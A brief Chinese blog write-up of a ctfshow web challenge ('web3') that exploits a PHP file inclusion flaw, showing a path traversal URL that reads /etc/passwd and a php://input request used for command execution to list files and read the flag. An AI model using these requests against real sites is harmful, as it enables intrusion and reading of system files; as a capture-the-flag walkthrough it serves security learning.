ctfshow—web—web3

打开靶机

 

 

 提示是文件包含漏洞

 

 测试成功

https://d7c9f3d7-64d2-4110-a14b-74c61f65893c.chall.ctf.show/?url=../../../../../../../../../../etc/passwd

 

 此题考的是PHP伪协议+文件包含,实现任意命令执行

抓取数据包

https://d7c9f3d7-64d2-4110-a14b-74c61f65893c.chall.ctf.show/?url=php://input

 

 开始试验,查询当前目录下的文件结构

 

 查看ctf_go_go_go文件内容

 

成功拿到flag

posted @ 2020-02-25 10:59  anweilx  阅读(3987)  评论(0编辑  收藏  举报